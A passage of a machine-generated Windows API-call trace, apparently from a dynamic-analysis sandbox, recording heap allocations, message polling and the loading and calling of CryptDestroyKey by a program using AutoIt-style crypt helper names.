Flags=0x0, Size=0x10) returned 0x2e50650 [0189.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504a0 [0189.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e503f8 [0189.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50590 [0189.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504b8 [0189.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0189.255] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50578 | out: hHeap=0x970000) returned 1 [0189.255] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e504d0 [0189.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0189.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0189.256] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0189.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0189.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50578 [0189.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54e48 [0189.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0189.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0189.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54de8 [0189.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50950 [0189.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54210 [0189.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0189.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0189.256] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0189.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54300 [0189.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0189.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0189.256] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0189.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0189.256] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d78 [0189.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0189.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0189.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0189.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0189.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0189.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0189.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0189.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50908 [0189.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0189.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0189.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0189.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0189.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e08 [0189.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e80178 [0189.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0189.257] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0189.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e80178 | out: hHeap=0x970000) returned 1 [0189.257] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0189.257] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0189.257] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0189.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0189.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0189.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0189.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0189.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0189.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0189.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0189.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0189.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0189.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0189.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0189.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0189.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0189.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0189.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0189.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0189.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0189.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542d8 [0189.258] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0189.258] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0189.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0189.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0189.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0189.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0189.259] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0189.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0189.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0189.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0189.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0189.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0189.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0189.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0189.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0189.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0189.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0189.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0189.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0189.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54de8 [0189.259] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0189.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0189.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.259] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0189.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0189.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0189.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0189.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0189.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0189.260] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50788, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0189.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0189.260] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0189.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0189.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0189.260] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0189.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0189.260] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0189.260] CryptDestroyKey (hKey=0xa87590) returned 1 [0189.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0189.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0189.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0189.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0189.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0189.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0189.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0189.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0189.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0189.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0189.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0189.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0189.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0189.261] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0189.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0189.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0189.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0189.261] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0189.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0189.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0189.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0189.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0189.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0189.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0189.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0189.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0189.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0189.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0189.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0189.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0189.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0189.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0189.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0189.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0189.262] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0189.262] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0189.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0189.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e08 [0189.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0189.262] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0189.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0189.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0189.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0189.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0189.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0189.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0189.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0189.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0189.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0189.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0189.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0189.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0189.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0189.263] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0189.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54378 [0189.263] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0189.263] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0189.263] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54378 | out: hHeap=0x970000) returned 1 [0189.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0189.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50758 [0189.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0189.264] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0189.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801e8 [0189.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0189.264] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0189.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801e8 | out: hHeap=0x970000) returned 1 [0189.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0189.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50740 [0189.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0189.264] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0189.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0189.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0189.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0189.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0189.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0189.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0189.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0189.264] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0189.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0189.264] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50770 [0189.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0189.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0189.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50908 [0189.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50920 [0189.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0189.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0189.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50998 [0189.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0189.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0189.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0189.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0189.265] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0189.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0189.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0189.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0189.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0189.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0189.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0189.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0189.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0189.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0189.265] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0189.266] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0189.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0189.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0189.266] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0189.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d88 [0189.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fca8 [0189.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d58 [0189.266] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0189.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fca8 | out: hHeap=0x970000) returned 1 [0189.266] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0189.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0189.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0189.266] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0189.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0189.266] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0189.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0189.304] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0189.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0189.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0189.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0189.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0189.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0189.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0189.305] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 1 [0189.305] TranslateMessage (lpMsg=0x8cf140) returned 0 [0189.305] DispatchMessageW (lpMsg=0x8cf140) returned 0x0 [0189.305] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0189.305] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 